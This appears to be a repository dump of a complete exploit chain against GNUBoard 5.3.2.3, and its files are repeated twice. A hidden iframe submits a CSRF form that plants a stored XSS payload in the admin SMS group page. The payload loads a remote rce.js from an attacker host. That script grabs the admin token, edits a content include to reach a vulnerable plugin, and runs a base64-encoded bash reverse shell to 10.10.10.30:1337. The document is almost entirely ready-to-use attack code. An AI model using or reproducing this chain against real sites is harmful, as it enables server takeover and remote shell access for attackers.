stypr/exploit.html

## exploit.html
<!--
	Stored XSS (2019.01.02)
-->
<form action="http://10.10.10.60/gnuboard5/adm/sms_admin/form_group_update.php" method="POST">
	<input type='hidden' name='fg_no' value=''>
	<input type='hidden' name='fg_name' id='payload' value=''>
</form>
<script>
	var random = Math.round(Math.random() * 1000000000);
	var script_url = '//10.10.10.30/vulnerable_rce_good_for_reason/rce.js'; // RCE from admin
	document.getElementById('payload').value = '" onfocus="$.getScript(\'' + script_url + '\')//10.10.10.60/' + random + '" autofocus value=미분류 ';
	document.forms[0].submit();
</script>

## index.html

<!--
	Exploit start
-->
<!doctype html>
<html>
    <head>
        <title>gnuboard5</title>
    </head>
    <body>
        <h1>GNUBoard 5.3.2.3 RCE (Authenticated)</h1>
	Date: 2019-01-01<br>
	Affected Browsers: Chrome/Firefox/Edge<br>
	Affected Version: 5.3 ~ 5.3.2.3<br>

	<!-- Hide and load exploit.html -->
	<iframe id="iframe" src="exploit.html" style="width:100px; height:100px; border:0; border:none; position:absolute; top: -1000px; left: -2000px;"></iframe>
    </body>
</html>

## rce.js
/*
	CSRF -> RCE Script

*/

// Linux Server reverse shell -- Change it to your preferred option
// base64 encoded of command ( /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.30/1337 0>&1' )
var cmd = 'L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjEwLjMwLzEzMzcgMD4mMSc=';
var ajax_token = '';
var co_id = 'community';

function stage3(){
	// Stage3 : Execute command
	cmd = encodeURIComponent(cmd);
	var xhr = new XMLHttpRequest();
	xhr.open('GET', '../../bbs/content.php?co_id=' + co_id + '&exe=echo ' + cmd + '|base64 -d|bash;%23', true);
	xhr.send(null);
}
function stage2(){
	// Stage2 : upload vulnerable script
	post_data = 'w=&co_html=1&token=' + ajax_token + '&co_id=' + co_id + '&co_subject=커뮤니티&co_content=community&co_mobile_content=&co_skin=basic&co_mobile_skin=basic&co_tag_filter_user=0&co_include_head=../plugin/okname/hpcert1.php&co_include_tail=&captcha_key=&co_himg=&co_timg=';
	var xhr = new XMLHttpRequest();
	xhr.onreadystatechange = function() {
	    if (xhr.readyState == XMLHttpRequest.DONE) {
		stage3();
	    }
	}
	xhr.open('POST', '../contentformupdate.php', true);
	xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
	xhr.send(post_data);
}
function stage1(){
	// Stage1 : Get admin token
	var xhr = new XMLHttpRequest();
	xhr.onreadystatechange = function() {
	    if (xhr.readyState == XMLHttpRequest.DONE) {
	        ajax_token = xhr.responseText.split('"token":"')[1].split('"')[0];
		stage2();
	    }
	}
	xhr.open('GET', '../ajax.token.php', true);
	xhr.send(null);
}

// Start from stage1
stage1();
	<!--
	Stored XSS (2019.01.02)
	-->
	<form action="http://10.10.10.60/gnuboard5/adm/sms_admin/form_group_update.php" method="POST">
	<input type='hidden' name='fg_no' value=''>
	<input type='hidden' name='fg_name' id='payload' value=''>
	</form>
	<script>
	var random = Math.round(Math.random() * 1000000000);
	var script_url = '//10.10.10.30/vulnerable_rce_good_for_reason/rce.js'; // RCE from admin
	document.getElementById('payload').value = '" onfocus="$.getScript(\'' + script_url + '\')//10.10.10.60/' + random + '" autofocus value=미분류 ';
	document.forms[0].submit();
	</script>

	<!--
	Exploit start
	-->
	<!doctype html>
	<html>
	<head>
	<title>gnuboard5</title>
	</head>
	<body>
	<h1>GNUBoard 5.3.2.3 RCE (Authenticated)</h1>
	Date: 2019-01-01<br>
	Affected Browsers: Chrome/Firefox/Edge<br>
	Affected Version: 5.3 ~ 5.3.2.3<br>

	<!-- Hide and load exploit.html -->
	<iframe id="iframe" src="exploit.html" style="width:100px; height:100px; border:0; border:none; position:absolute; top: -1000px; left: -2000px;"></iframe>
	</body>
	</html>
	/*
	CSRF -> RCE Script

	*/

	// Linux Server reverse shell -- Change it to your preferred option
	// base64 encoded of command ( /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.30/1337 0>&1' )
	var cmd = 'L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjEwLjMwLzEzMzcgMD4mMSc=';
	var ajax_token = '';
	var co_id = 'community';

	function stage3(){
	// Stage3 : Execute command
	cmd = encodeURIComponent(cmd);
	var xhr = new XMLHttpRequest();
	xhr.open('GET', '../../bbs/content.php?co_id=' + co_id + '&exe=echo ' + cmd + '\|base64 -d\|bash;%23', true);
	xhr.send(null);
	}
	function stage2(){
	// Stage2 : upload vulnerable script
	post_data = 'w=&co_html=1&token=' + ajax_token + '&co_id=' + co_id + '&co_subject=커뮤니티&co_content=community&co_mobile_content=&co_skin=basic&co_mobile_skin=basic&co_tag_filter_user=0&co_include_head=../plugin/okname/hpcert1.php&co_include_tail=&captcha_key=&co_himg=&co_timg=';
	var xhr = new XMLHttpRequest();
	xhr.onreadystatechange = function() {
	if (xhr.readyState == XMLHttpRequest.DONE) {
	stage3();
	}
	}
	xhr.open('POST', '../contentformupdate.php', true);
	xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
	xhr.send(post_data);
	}
	function stage1(){
	// Stage1 : Get admin token
	var xhr = new XMLHttpRequest();
	xhr.onreadystatechange = function() {
	if (xhr.readyState == XMLHttpRequest.DONE) {
	ajax_token = xhr.responseText.split('"token":"')[1].split('"')[0];
	stage2();
	}
	}
	xhr.open('GET', '../ajax.token.php', true);
	xhr.send(null);
	}

	// Start from stage1
	stage1();